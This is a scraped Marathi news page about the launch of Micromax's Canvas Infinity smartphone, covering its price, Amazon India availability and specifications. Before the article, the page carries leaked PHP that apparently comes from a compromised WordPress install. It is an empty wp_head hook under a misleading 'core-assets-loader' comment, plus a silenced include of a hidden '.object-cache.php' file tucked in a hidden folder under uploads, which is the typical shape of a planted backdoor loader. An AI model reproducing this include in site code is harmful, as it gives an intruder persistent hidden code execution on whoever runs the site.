add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मायक्रोमॅक्सचा ‘कॅनव्हास इन्फिनिटी’ लॉन्च – SOCH INDIA
Menu

टेक्नोलॉजी
मायक्रोमॅक्सचा ‘कॅनव्हास इन्फिनिटी’ लॉन्च

nobanner

मायक्रोमॅक्स’ या भारतीय स्मार्टफोन मेकर कंपनीने मोठ्या कालावधीनंतर बाजारात पुनरागमन केले आहे. बहुचर्चित ‘कॅनव्हास इन्फिनिटी’ हा नवा स्मार्टफोन लॉन्च केला आहे. कॉम्पॅक्ट बॉडीमधील आकाराने मोठा डिस्प्ले हा या स्मार्टफोनच्या आकर्षणाचा केंद्र आहे.

9 हजार 999 रुपये किंमतीचा ‘कॅनव्हास इन्फिनिटी’ स्मार्टफोन अमेझॉन इंडियाच्या वेबसाईटवर खरेदीसाठी उपलब्ध करुन देण्यात आले आहे.

फीचर्स –

5.7 इंचाचा स्क्रीनअँड्रॉईड नॉगट 7.1 ओएस (अँड्रॉईढ 8.0 O ऑरियो अपग्रेडेबल)क्वालकॉम स्नॅपड्रॅगन 425 चिपसेट3 जीबी रॅम32 जीबी रॅम इंटरनल मेमरी128 जीबीपर्यंत मेमरी वाढवण्याची सुविधा16 मेगापिक्सेल फ्रंट फेसिंग कॅमेरा13 मेगापिक्सेल रिअर कॅमेरा
कनेक्टिव्हिटीमध्येही आकर्षक फीचर्स या स्मार्टफोनमध्ये देण्यात आले आहेत. 4G, VoLTE, ब्लूटूथ, वायफाय, जीपीएस यांसारखे पर्याय कनेक्टिव्हिटीमध्ये आहेत. बॅटरी क्षमता 2900 mAh एवढी आहे. याचसोबत या स्मार्टफोनमध्ये फिंगरप्रिंट सेन्सरही देण्यात आलं आहे.